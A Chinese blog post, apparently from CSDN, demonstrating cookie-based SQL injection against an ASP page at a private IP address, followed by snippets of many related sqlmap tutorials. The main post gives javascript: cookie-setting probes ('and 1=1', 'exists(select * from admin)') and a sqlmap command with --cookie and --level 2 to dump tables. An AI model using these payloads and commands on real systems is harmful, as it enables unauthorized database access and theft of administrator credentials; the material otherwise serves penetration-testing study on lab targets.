sqlmap cookie注入实战

最新推荐文章于 2024-09-14 14:38:47 发布

阅读量2.9k

点赞数 2

本文链接：https://blog.csdn.net/MyJDL/article/details/54861772

版权

目标http://192.168.1.105/shownews.asp?id=182

先手工注入

javascript:alert(document.cookie="id="+escape("182"))

回车

再打开一个窗口输入http://192.168.1.105/shownews.asp?

如果不报错的话就是存在cookie注入

javascript:alert(document.cookie="id="+escape("182 and 1=1"))

javascript:alert(document.cookie="id="+escape("182 and 1=2"))

javascript:alert(document.cookie="id="+escape("182 and exists(select * from admin)"))

等等

这时可以用sqlmap

sqlmap -u http://192.168.1.105/shownews.asp? --cookie id=182 --level 2 --tables

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

关注关注

2
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

sqlmap----Cookie注入实战

小明师傅博客

06-06

543

这里我们用封神台的靶场演示一个典型的cookie注入测试时被waf，限制了上sqlmap sqlmap.py -u "xxxxxxxx/shownews.asp" --cookie "?id=170" --leve2 --table 这里不知道为什么leve 5 不行,不过2是专门给cookie注入用的，还有这里为什么不爆库呢，因为这里是asp+access数据库，查询不了，所以直接查2表拿到密码，找后台,登陆 ...

【网络安全 | 渗透工具】SQLmap加密注入教程+实战详析

等风来

08-02

6409

在使用手工注入绕过参数加密的限制时，需要构造出原始POC再进行加密注入，耗时耗力，因此采用sqlmap加密注入。表示只对该参数进行注入测试，不加 * 的话还会测试其他参数是否为注入点，增加时间。选择默认选项，跑sqlmap的时候加上这句话可节约时间、不需要回复提示

参与评论您还未登录，请先登录后发表或查看评论

SQL labs-SQL注入（五，使用sqlmap进行cookie注入）

2302_80280669的博客

07-24

780

Cookie 是一些数据, 存储于你电脑上的文本文件中。当 web 服务器向浏览器发送 web 页面时，在连接关闭后，服务端不会记录用户的信息。Cookie 的作用就是用于解决 "如何记录客户端的用户信息":当用户访问 web 页面时，他的名字可以记录在 cookie 中。在用户下一次访问该页面时，可以在 cookie 中读取用户访问记录。

SQL注入之sqlmap实战

最新发布

bigbangbangbang1的博客

09-14

1117

sqlmap 是一款自动化的 SQL 注入工具，它可以检测、利用和接管数据库服务器。它支持多种数据库管理系统，包括 MySQL、Oracle、PostgreSQL、Microsoft SQL Server 等。自动化检测：能够自动检测目标网站是否存在 SQL 注入漏洞。多种攻击方式：支持基于错误、布尔盲注、时间盲注等多种 SQL 注入攻击方式。数据库枚举：可以枚举数据库的名称、表名、列名和数据。权限提升：尝试提升数据库用户的权限，以获取更高的访问权限。

Sqlmap2021 -- Cookie注入

weixin_41489908的博客

07-07

4140

喧闹任其喧闹，自有我自为之，我自风情万种，与世无争。。。 ---- 网易云热评一、检测Cookie注入 1、通过BurpSuite抓包，将封包内容保存到1.txt GET /sqli/Less-20/index.php HTTP/1.1 Host: 192.168.139.129 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x.

SQLmap————4、Cookie注入

Fly_鹏程万里

05-04

984

说明：默认情况下SQLMAP只支持GET/POST参数的注入测试，但是当使用–level 参数且数值>=2的时候也会检查cookie时面的参数，当>=3的时候将检查User-agent和Referer，那么这就很简单了，我们直接在原有的基础上面加上 –level 2 即可！1、判断是否可以注入Sqlmap –u http://www.xxx.com/cookie/test.asp -...

sqlmap指定cookie_SQLmap的cookie注入测试

weixin_39568232的博客

12-24

832

最近公司系统在做安全方面的整改，有个接口可通过sql注入获取到用户数据库，进而获取到表及表结构信息。故，学习了sqlmap注入中cookie注入相关知识，并做以总结。这是对一个接口做的简单sql注入测试：经过多次尝试，最终用cookie注入测试：sqlmap.py-u “url地址” –cookie “requests里面的set-cookie信息” --tables--time-sec=2...

利用SQLmap实现 SQL 注入

m0_71805735的博客

06-21

2465

利用SQLmap实现 SQL 注入

SQL注入攻击及防御手动注入+sqlmap自动化注入实战（网络安全学习12）

Until_U的博客

07-05

4784

1 项目实验环境测试渗透机：kali_linux-2020 链接：https://pan.baidu.com/s/1apN96nIcs1Fyx8YmFs24Xg 提取码：32ve 目标靶机：owasp_Broken_Web_Apps 链接：https://pan.baidu.com/s/1CMJ2aERmDGlXXkhUmjDmtA 提取码：9zsj 2 SQL注入概述 2.1 SQL注入简介在owasp年度top 10安全问题中，注入高居榜首。SQL注入攻击指的是通过构建特殊..

Cookie注入实战：漏洞利用与防范

在`sqlmap-rtarget.txt`文件中，level3级别的扫描可能专门针对Cookie注入漏洞进行。通过这个级别的扫描，攻击者可以更深入地探测系统中的漏洞，从而实施进一步的攻击。总结来说，这一章节的核心内容包括Cookie的...

SQLMAP进阶使用 --cookie

Z_l123的博客

02-19

6378

实验原理 Cookie，指某些网站为了辨别用户身份而储存在用户本地终端上的数据。Cookie在 Web应用中至关重要，用户的唯一标识session id也是存在cookie 中的。利用SQLMAP对目标网站进行检测时，默认是不带cookie 的，在一些情况下发出去的请求可能会被服务器拒之门外。这时,我们需要带上 cookie才能进行SQL注入检测。 1.访问DVWA网站 1）访问dvwa，并登录。admin password 2）登录后，在左侧菜单点击“DVWA Security”，将DVWA

COOKIE注入原理动画教程

12-12

COOKIE注入原理动画教程,教你掌握cooke注入的原理,值得一看!

sqlmap之(五)----Cookie注入实战

热门推荐

fendo

02-28

2万+

(1) cookie注入，猜解表 sqlmap.py -u "http://192.168.87.129/shownews.asp" --cookie "id=27" --table --level 2 do you want to URL encode cookie values (implementation specific)? [Y/n] 你想要对URL值

关于ctfhub中cookie注入方法之sqlmap自动注入

m0_62819604的博客

10-23

733

首先，我们可以使用burpsuite进行抓包。如图所示，可以发现注入点为id=1。然后我们可以使用kali linux里的sqlmap自动注入。首先查询数据库名称sqlmap -u "http://challenge-593b577518b0da97.sandbox.ctfhub.com:10800/" --cookie "id=1" --level 2 --dbs 发现数据库为sqli 然后查询数据库表sqlmap -u "http://challenge-593b57751..

SQL注入——cookie注入

weixin_74991270的博客

10-10

557

工具很方面，但是IP老是被ban手工虽说很麻烦，但是还是有惊喜的多挖挖src增加实战经验。

sqlmap之access——cookie注入

qq_45300786的博客

07-18

338

先把这个GET传参（id=171）删了然后复制下这个网址，用sqlmap跑 sqlmap.py -u "http://59.63.200.79:8004/shownews.asp" --cookie "id=170" level 2 包网址起来，然后参数，后面跟值包起来，等级为2 才会对cookie注入进行检车跑出来类型是Cookie ...

利用SQLMap进行cookie注入

kuxing100的专栏

05-05

2040

SQLMap被称为注入神器，N多大神都使用SQLmap来进行注入测试，我等小菜当然也会用来装一下A*C，用了N久SQLMAP了，但是极少用到cookie注入，一遇到cookie注入就去使用注入中转工具，比较麻烦。刚好今天群里的USB问起sqlmap是否支持cookie注入，就研究了一下，发现其实sqlmap进行cookie注入很简单的。测试URL：参数获取使用的是

sqlmap指定cookie_sqlmap处理cookie数据

weixin_34061793的博客

12-24

1922

Cookie，指某些网站为了辨别用户身份而储存在用户本地终端上的数据。Cookie在web应用中至关重要，用户的唯一标识session id也是存在cookie中的。那么，在sqlmap使用的时候，也会经常需要考虑到cookie。sqlmap也提供了和cookie相关的命令，本文将会介绍。1. cookie保存了用户登录状态很多网站的功能都是需要登陆后才能访问，而http本身是无状态的，因此服务器...

sqlmap指定cookie_SQLMap使用

weixin_39628041的博客

01-30

2093

SQLMap sqlmap是一款SQL注入漏洞测试工具，支持MySQL, Oracle,PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird,Sybase和SAP MaxDB等数据库的各种安全漏洞检测。常用参数注意：必须指定至少一个目标-u#指定URL，必须使用双引号包含url--...